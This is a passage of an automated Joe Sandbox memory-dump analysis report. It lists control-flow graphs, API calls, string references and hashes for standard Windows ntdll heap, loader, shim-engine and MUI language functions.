                                                  control_flow_graph 204 345a9060-345a90a9 205 345a90ab-345a90b0 204->205 206 345a90f8-345a9107 204->206 208 345a90b4-345a90ba 205->208 207 345a9109-345a910e 206->207 206->208 209 345a9893-345a98a7 call 34544b50 207->209 210 345a90c0-345a90e4 call 34548f40 208->210 211 345a9215-345a923d call 34548f40 208->211 220 345a9113-345a91b4 GetPEB call 345ad7e5 210->220 221 345a90e6-345a90f3 call 345c92ab 210->221 218 345a923f-345a925a call 345a98aa 211->218 219 345a925c-345a9292 211->219 224 345a9294-345a9296 218->224 219->224 230 345a91d2-345a91e7 220->230 231 345a91b6-345a91c4 220->231 232 345a91fd-345a9210 RtlDebugPrintTimes 221->232 224->209 228 345a929c-345a92b1 RtlDebugPrintTimes 224->228 228->209 238 345a92b7-345a92be 228->238 230->232 234 345a91e9-345a91ee 230->234 231->230 233 345a91c6-345a91cb 231->233 232->209 233->230 236 345a91f3-345a91f6 234->236 237 345a91f0 234->237 236->232 237->236 238->209 240 345a92c4-345a92df 238->240 241 345a92e3-345a92f4 call 345aa388 240->241 244 345a92fa-345a92fc 241->244 245 345a9891 241->245 244->209 246 345a9302-345a9309 244->246 245->209 247 345a930f-345a9314 246->247 248 345a947c-345a9482 246->248 249 345a933c 247->249 250 345a9316-345a931c 247->250 251 345a9488-345a94b7 call 34548f40 248->251 252 345a961c-345a9622 248->252 254 345a9340-345a9391 call 34548f40 RtlDebugPrintTimes 249->254 250->249 253 345a931e-345a9332 250->253 269 345a94b9-345a94c4 251->269 270 345a94f0-345a9505 251->270 256 345a9674-345a9679 252->256 257 345a9624-345a962d 252->257 260 345a9338-345a933a 253->260 261 345a9334-345a9336 253->261 254->209 296 345a9397-345a939b 254->296 258 345a9728-345a9731 256->258 259 345a967f-345a9687 256->259 257->241 264 345a9633-345a966f call 34548f40 257->264 258->241 268 345a9737-345a973a 258->268 265 345a9689-345a968d 259->265 266 345a9693-345a96bd call 345a8093 259->266 260->254 261->254 289 345a9869 264->289 265->258 265->266 293 345a9888-345a988c 266->293 294 345a96c3-345a971e call 34548f40 RtlDebugPrintTimes 266->294 275 345a97fd-345a9834 call 34548f40 268->275 276 345a9740-345a978a 268->276 277 345a94cf-345a94ee 269->277 278 345a94c6-345a94cd 269->278 272 345a9511-345a9518 270->272 273 345a9507-345a9509 270->273 282 345a953d-345a953f 272->282 280 345a950b-345a950d 273->280 281 345a950f 273->281 306 345a983b-345a9842 275->306 307 345a9836 275->307 286 345a978c 276->286 287 345a9791-345a979e 276->287 288 345a9559-345a9576 RtlDebugPrintTimes 277->288 278->277 280->272 281->272 297 345a951a-345a9524 282->297 298 345a9541-345a9557 282->298 286->287 290 345a97aa-345a97ad 287->290 291 345a97a0-345a97a3 287->291 288->209 310 345a957c-345a959f call 34548f40 288->310 292 345a986d 289->292 301 345a97b9-345a97fb 290->301 302 345a97af-345a97b2 290->302 291->290 300 345a9871-345a9886 RtlDebugPrintTimes 292->300 293->241 294->209 336 345a9724 294->336 308 345a93eb-345a9400 296->308 309 345a939d-345a93a5 296->309 303 345a952d 297->303 304 345a9526 297->304 298->288 300->209 300->293 301->300 302->301 314 345a952f-345a9531 303->314 304->298 312 345a9528-345a952b 304->312 315 345a984d 306->315 316 345a9844-345a984b 306->316 307->306 311 345a9406-345a9414 308->311 317 345a93d2-345a93e9 309->317 318 345a93a7-345a93d0 call 345a8093 309->318 333 345a95bd-345a95d8 310->333 334 345a95a1-345a95bb 310->334 320 345a9418-345a946f call 34548f40 RtlDebugPrintTimes 311->320 312->314 322 345a953b 314->322 323 345a9533-345a9535 314->323 324 345a9851-345a9857 315->324 316->324 317->311 318->320 320->209 340 345a9475-345a9477 320->340 322->282 323->322 329 345a9537-345a9539 323->329 330 345a9859-345a985c 324->330 331 345a985e-345a9864 324->331 329->282 330->289 331->292 337 345a9866 331->337 338 345a95dd-345a960b RtlDebugPrintTimes 333->338 334->338 336->258 337->289 338->209 342 345a9611-345a9617 338->342 340->293 342->268
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: c7877cc2ff08107a65438de50ab66ac8747e2dc7643a3f4b0137f018419616bc
                                                  • Instruction ID: be745a6b128244ff8f542acf6b9319ba4ac8ebf0b3c1296ed5c3ade24ef38b27
                                                  • Opcode Fuzzy Hash: c7877cc2ff08107a65438de50ab66ac8747e2dc7643a3f4b0137f018419616bc
                                                  • Instruction Fuzzy Hash: 3F32FFB5A083818FE351CF68D884B5EBBE5BB88344F404D2EF5998B250DB74E948DF52
                                                  Function 345AFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 413 345afdf4-345afe16 call 34557be4 416 345afe18-345afe30 RtlDebugPrintTimes 413->416 417 345afe35-345afe4d call 344f7662 413->417 423 345b02d1-345b02e0 416->423 421 345afe53-345afe69 417->421 422 345b0277 417->422 424 345afe6b-345afe6e 421->424 425 345afe70-345afe72 421->425 426 345b027a-345b02ce call 345b02e6 422->426 427 345afe73-345afe8a 424->427 425->427 426->423 429 345b0231-345b023a GetPEB 427->429 430 345afe90-345afe93 427->430 434 345b0259-345b025e call 344fb910 429->434 435 345b023c-345b0257 GetPEB call 344fb910 429->435 430->429 432 345afe99-345afea2 430->432 437 345afebe-345afed1 call 345b0835 432->437 438 345afea4-345afebb call 3450fed0 432->438 441 345b0263-345b0274 call 344fb910 434->441 435->441 448 345afedc-345afef0 call 344f753f 437->448 449 345afed3-345afeda 437->449 438->437 441->422 452 345b0122-345b0127 448->452 453 345afef6-345aff02 GetPEB 448->453 449->448 452->426 456 345b012d-345b0139 GetPEB 452->456 454 345aff70-345aff7b 453->454 455 345aff04-345aff07 453->455 461 345b0068-345b007a call 34512710 454->461 462 345aff81-345aff88 454->462 457 345aff09-345aff24 GetPEB call 344fb910 455->457 458 345aff26-345aff2b call 344fb910 455->458 459 345b013b-345b013e 456->459 460 345b01a7-345b01b2 456->460 473 345aff30-345aff51 call 344fb910 GetPEB 457->473 458->473 465 345b015d-345b0162 call 344fb910 459->465 466 345b0140-345b015b GetPEB call 344fb910 459->466 460->426 463 345b01b8-345b01c3 460->463 484 345b0110-345b011d call 345b0d24 call 345b0835 461->484 485 345b0080-345b0087 461->485 462->461 469 345aff8e-345aff97 462->469 463->426 470 345b01c9-345b01d4 463->470 483 345b0167-345b017b call 344fb910 465->483 466->483 476 345affb8-345affbc 469->476 477 345aff99-345affa9 469->477 470->426 478 345b01da-345b01e3 GetPEB 470->478 473->461 504 345aff57-345aff6b 473->504 479 345affce-345affd4 476->479 480 345affbe-345affcc call 34533ae9 476->480 477->476 486 345affab-345affb5 call 345bd646 477->486 488 345b0202-345b0207 call 344fb910 478->488 489 345b01e5-345b0200 GetPEB call 344fb910 478->489 491 345affd7-345affe0 479->491 480->491 516 345b017e-345b0188 GetPEB 483->516 484->452 494 345b0089-345b0090 485->494 495 345b0092-345b009a 485->495 486->476 513 345b020c-345b022c call 345a823a call 344fb910 488->513 489->513 502 345afff2-345afff5 491->502 503 345affe2-345afff0 491->503 494->495 506 345b00b8-345b00bc 495->506 507 345b009c-345b00ac 495->507 514 345afff7-345afffe 502->514 515 345b0065 502->515 503->502 504->461 510 345b00be-345b00d1 call 34533ae9 506->510 511 345b00ec-345b00f2 506->511 507->506 508 345b00ae-345b00b3 call 345bd646 507->508 508->506 527 345b00e3 510->527 528 345b00d3-345b00e1 call 3452fdb9 510->528 521 345b00f5-345b00fc 511->521 513->516 514->515 520 345b0000-345b000b 514->520 515->461 516->426 522 345b018e-345b01a2 516->522 520->515 525 345b000d-345b0016 GetPEB 520->525 521->484 526 345b00fe-345b010e 521->526 522->426 530 345b0018-345b0033 GetPEB call 344fb910 525->530 531 345b0035-345b003a call 344fb910 525->531 526->484 534 345b00e6-345b00ea 527->534 528->534 537 345b003f-345b005d call 345a823a call 344fb910 530->537 531->537 534->521 537->515
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: a572bf37b0c776de3ac32b9f00893fd0f450a690b3d83d7168f099e9e7c64523
                                                  • Instruction ID: ce05a561abc150c23f9a994db495759f6a3067ea8f3f6afa196e66fac19e86c4
                                                  • Opcode Fuzzy Hash: a572bf37b0c776de3ac32b9f00893fd0f450a690b3d83d7168f099e9e7c64523
                                                  • Instruction Fuzzy Hash: CBD1EF36908685DFEF02CFA4D800AADFBF1FF4AB04F448499E484AB652C7369945EF11
                                                  Function 344FD2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1189 344fd2ec-344fd32d 1190 3455a69c 1189->1190 1191 344fd333-344fd335 1189->1191 1193 3455a6a6-3455a6bf call 345bbd08 1190->1193 1191->1190 1192 344fd33b-344fd33e 1191->1192 1192->1190 1194 344fd344-344fd34c 1192->1194 1202 3455a6c5-3455a6c8 1193->1202 1203 344fd56a-344fd56d 1193->1203 1196 344fd34e-344fd350 1194->1196 1197 344fd356-344fd3a1 call 34545050 call 34542ab0 1194->1197 1196->1197 1199 3455a5f6-3455a5fb 1196->1199 1212 3455a600-3455a61a call 344f7220 1197->1212 1213 344fd3a7-344fd3b0 1197->1213 1201 344fd5c0-344fd5c8 1199->1201 1207 344fd54d-344fd54f 1202->1207 1206 344fd56f-344fd575 1203->1206 1210 344fd63b-344fd63d 1206->1210 1211 344fd57b-344fd588 GetPEB call 34513bc0 1206->1211 1207->1203 1209 344fd551-344fd564 call 34523262 1207->1209 1209->1203 1229 3455a6cd-3455a6d2 1209->1229 1214 344fd58d-344fd592 1210->1214 1211->1214 1233 3455a624-3455a628 1212->1233 1234 3455a61c-3455a61e 1212->1234 1219 344fd3ba-344fd3cd call 344fd736 1213->1219 1220 344fd3b2-344fd3b4 1213->1220 1217 344fd594-344fd59d call 34542a80 1214->1217 1218 344fd5a1-344fd5a6 1214->1218 1217->1218 1225 344fd5a8-344fd5b1 call 34542a80 1218->1225 1226 344fd5b5-344fd5ba 1218->1226 1239 344fd3d3-344fd3d7 1219->1239 1240 3455a658 1219->1240 1220->1219 1224 3455a630-3455a63b call 345bad61 1220->1224 1224->1219 1247 3455a641-3455a653 1224->1247 1225->1226 1226->1201 1235 3455a6d7-3455a6db call 34542a80 1226->1235 1229->1203 1233->1224 1234->1233 1241 344fd52e 1234->1241 1243 3455a6e0 1235->1243 1245 344fd3dd-344fd3f7 call 344fd8d0 1239->1245 1246 344fd5cb-344fd623 call 34545050 call 34542ab0 1239->1246 1248 3455a660-3455a662 1240->1248 1244 344fd530-344fd535 1241->1244 1243->1243 1249 344fd549 1244->1249 1250 344fd537-344fd539 1244->1250 1245->1248 1257 344fd3fd-344fd44e call 34545050 call 34542ab0 1245->1257 1263 344fd625 1246->1263 1264 344fd642-344fd645 1246->1264 1247->1219 1248->1203 1253 3455a668 1248->1253 1249->1207 1250->1193 1254 344fd53f-344fd543 1250->1254 1259 3455a66d 1253->1259 1254->1193 1254->1249 1257->1240 1269 344fd454-344fd45d 1257->1269 1265 3455a677-3455a67c 1259->1265 1267 344fd62f-344fd636 1263->1267 1264->1241 1265->1210 1267->1244 1269->1259 1270 344fd463-344fd492 call 34545050 call 344fd64a 1269->1270 1270->1267 1275 344fd498-344fd49e 1270->1275 1275->1267 1276 344fd4a4-344fd4aa 1275->1276 1276->1210 1277 344fd4b0-344fd4cc GetPEB call 34515d90 1276->1277 1277->1265 1280 344fd4d2-344fd4ef call 344fd64a 1277->1280 1283 344fd526-344fd52c 1280->1283 1284 344fd4f1-344fd4f6 1280->1284 1283->1206 1283->1241 1285 344fd4fc-344fd524 call 34524ca6 1284->1285 1286 3455a681-3455a686 1284->1286 1285->1283 1286->1285 1288 3455a68c-3455a697 1286->1288 1288->1244
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.R4
                                                  • API String ID: 0-4152826611
                                                  • Opcode ID: 396109386393a79daa2f3fe395af8ee195dc5bece5bf4e431cca38192150d3f2
                                                  • Instruction ID: 4fcaebf0f0eda806aff6a0598634291d89e1067dd96d6f610a5a8e5efed2af72
                                                  • Opcode Fuzzy Hash: 396109386393a79daa2f3fe395af8ee195dc5bece5bf4e431cca38192150d3f2
                                                  • Instruction Fuzzy Hash: 4BB19AB69083519FEB21CF24D840A5BB7E8AB88754F40493EF98A97350DB71D908DB92
                                                  Function 345AF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: cca102d3f53f1972b14e4c0570063a98d2d6a1893d903ba4df6873e5536b473d
                                                  • Instruction ID: 37291b806b2066c95157a8eab5433db0588c32d529feb1a71e8fb4c6cd8503c1
                                                  • Opcode Fuzzy Hash: cca102d3f53f1972b14e4c0570063a98d2d6a1893d903ba4df6873e5536b473d
                                                  • Instruction Fuzzy Hash: 4391BC36E05684DFEB02CFA8D840A9DBBF1FF4A314F44846EE445EB652CB369941EB14
                                                  Function 344F640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 344F651C
                                                    • Part of subcall function 344F6565: RtlDebugPrintTimes.NTDLL ref: 344F6614
                                                    • Part of subcall function 344F6565: RtlDebugPrintTimes.NTDLL ref: 344F665F
                                                  Strings
                                                  • apphelp.dll, xrefs: 344F6446
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34559790
                                                  • LdrpInitShimEngine, xrefs: 34559783, 34559796, 345597BF
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 345597A0, 345597C9
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3455977C
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 345597B9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: 53a717ef32e3c7caf6374b7c8f54893cbf77291f54fb488b38ce8680228d53c8
                                                  • Instruction ID: fa68f46e87b682367cd59448fc353f0013ea4a807850e4f4a6b061d81d74aedc
                                                  • Opcode Fuzzy Hash: 53a717ef32e3c7caf6374b7c8f54893cbf77291f54fb488b38ce8680228d53c8
                                                  • Instruction Fuzzy Hash: 9B51BE71A08700DFE720DF20D890A6B77E8FB84244F40096EF995A71A1EB35EA45DF93
                                                  Function 344FD02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 344FD136
                                                  • @, xrefs: 344FD24F
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 344FD06F
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 344FD0E6
                                                  • @, xrefs: 344FD2B3
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 344FD263
                                                  • h.R4, xrefs: 3455A5D2
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 344FD202
                                                  • @, xrefs: 344FD09D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.R4
                                                  • API String ID: 0-1042752141
                                                  • Opcode ID: bd949e7bae8153900b81eaf16f58d70b3e7cdcc42469239bc7771114656713ea
                                                  • Instruction ID: fcd6b1bd818f8fa779629968fb97a807ca12ab3117b5c5f3cc34e924ffe3aabb
                                                  • Opcode Fuzzy Hash: bd949e7bae8153900b81eaf16f58d70b3e7cdcc42469239bc7771114656713ea
                                                  • Instruction Fuzzy Hash: 19A16CB1908345DFEB21CF20D940B5BB7E8BB84765F40492EFA8A96240DB75D908DF93
                                                  Function 3452D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 3452D879
                                                    • Part of subcall function 34504779: RtlDebugPrintTimes.NTDLL ref: 34504817
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: c0ee4e64355161c42d55014f55f906b6cd43e08cf40b5cb899b5d0a49bb21eb7
                                                  • Instruction ID: 4a93e13b7103619835917b095969c4b5acdd2175c2480c754f350128d547e8f8
                                                  • Opcode Fuzzy Hash: c0ee4e64355161c42d55014f55f906b6cd43e08cf40b5cb899b5d0a49bb21eb7
                                                  • Instruction Fuzzy Hash: 1151DF76E04349DFEB04CFA4C48479DBBB1FF84314FA4415AD901AB2C2D774A98AEB81
                                                  Function 345AF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                  • API String ID: 0-2224505338
                                                  • Opcode ID: 8d2dc1c13239e050fffec99e277dcfaa8652d4e1a583303f465ea4c9838a54ed
                                                  • Instruction ID: 798e39bacd20d84c1109ef5db30e2390ab14aca8c050df258050b358d348d64f
                                                  • Opcode Fuzzy Hash: 8d2dc1c13239e050fffec99e277dcfaa8652d4e1a583303f465ea4c9838a54ed
                                                  • Instruction Fuzzy Hash: E351F537A11284EFEB02CF54D854E1EB3A8EF0A764F1488ADF501DB663CA32D940EE15
                                                  Function 3452237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3456A79F
                                                  • DGM4, xrefs: 34522382
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3456A7AF
                                                  • LdrpDynamicShimModule, xrefs: 3456A7A5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DGM4$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-3063358063
                                                  • Opcode ID: ebbacd078b9714ade2dcd19e9c0958509bfa5aa124a62ff777d2d56945e3fbbc
                                                  • Instruction ID: 4031fe1ec8074e9648d5a6af24847df0c6742f823cbaca6dd8984d46d72481d7
                                                  • Opcode Fuzzy Hash: ebbacd078b9714ade2dcd19e9c0958509bfa5aa124a62ff777d2d56945e3fbbc
                                                  • Instruction Fuzzy Hash: BD31D07AF00200EFFB109F59D880A5A77B5FB91754F54406DF902A7250DB74AD83EB92
                                                  Function 344FF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: 835488afdc140e7d3b6a0924692a454c2289005bc344cdf92be7fba6ef05d4c9
                                                  • Instruction ID: 8b63b40d147ddbae3a0d1dc1d4aa1daa000b0f7ca53036f354a06be12cbc2e8a
                                                  • Opcode Fuzzy Hash: 835488afdc140e7d3b6a0924692a454c2289005bc344cdf92be7fba6ef05d4c9
                                                  • Instruction Fuzzy Hash: 0B42F175A04381DFEB15CF24C884B2AB7E5FF84244F4489AEE486CB762DB31D946CB52
                                                  Function 3452510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.R4
                                                  • API String ID: 0-791599749
                                                  • Opcode ID: 25cd71d831d2d44080e5b174e2a25845c09338f3780b8f74500928de88435b8f
                                                  • Instruction ID: 7b06988a2bfc75a4df6a29293df6e9ae3045ee15ef01b44458324ceca1751328
                                                  • Opcode Fuzzy Hash: 25cd71d831d2d44080e5b174e2a25845c09338f3780b8f74500928de88435b8f
                                                  • Instruction Fuzzy Hash: 99F14D76D00228EFEB51CF94D980EDEBBBCEF49650F50446AE505E7250EB749E01EB90
                                                  Function 3451B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: f5afe6c9990e90bab80946673b0133ea6dfc2eafe0ca21f9811576e5635ee2da
                                                  • Instruction ID: ff4b7e27e01fc27e0d2a0bf14f34330ade9ecf7ec61252568b9e3abf5c0b7292
                                                  • Opcode Fuzzy Hash: f5afe6c9990e90bab80946673b0133ea6dfc2eafe0ca21f9811576e5635ee2da
                                                  • Instruction Fuzzy Hash: 71C14675E01315EFFF148B64D890BBEB7A5AF46304F54446DE812EB294EB78C948E390
                                                  Function 34532594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RtlGetAssemblyStorageRoot, xrefs: 34571F6A, 34571FA4, 34571FC4
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34571FC9
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34571F82
                                                  • SXS: %s() passed the empty activation context, xrefs: 34571F6F
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34571F8A
